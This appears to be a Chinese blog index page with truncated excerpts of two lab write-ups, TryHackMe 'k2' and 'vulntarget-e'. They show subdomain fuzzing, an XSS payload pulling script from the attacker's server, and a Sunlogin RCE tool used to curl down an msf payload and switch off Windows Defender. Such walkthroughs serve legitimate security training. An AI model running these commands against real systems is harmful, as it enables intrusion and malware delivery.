tryhackme-k2 Writeup
Base Camp首先进行端口扫描和目录扫描对k2.thm 是个静态页面也没啥关键信息 试着爆破子域名,使用fuff 1ffuf -w D:\tools\DICT\PasswordDic\域名字典\subnames-9.5w.txt -u http://k2.thm/ -H "HOST:FUZZ.k2.thm" -fw 811 接着对域名和ip绑定 访问两个页面 前面内容大差不差 admin登录不进去 我们先注册个用户普通用户进去 进去之后是个文本框 抓包测试一下看眼参数,先简单测试一下sql注入好像没有 接着测试xss,在本地先启一个python服务 1python -m http.server 80 插入xss语句 12<script src="http://10.11.112.0/test"></script><script...
vulntarget-e
vulntarget-e 打靶1.外网靶机(win2016)端口扫描,49773端口存在向日葵服务 扫描是否存在向日葵rce https://github.com/Mr-xn/sunlogin_rce 尝试执行命令 1sunRce.exe -t rce -p 49773 -h 192.168.237.139 -c "whoami" 生成msf木马 python开启http服务下载木马 有windows Defender(关闭) 关闭防火墙 1234python -m http.server 80sunRce.exe -t rce -p 49773 -h 192.168.237.139 -c "curl -o c://bb.exe http://192.168.237.129/bind.exe"sunRce.exe -t rce -p 49773 -h 192.168.237.139 -c "set-MpPreference -DisableRealtimeMonitoring...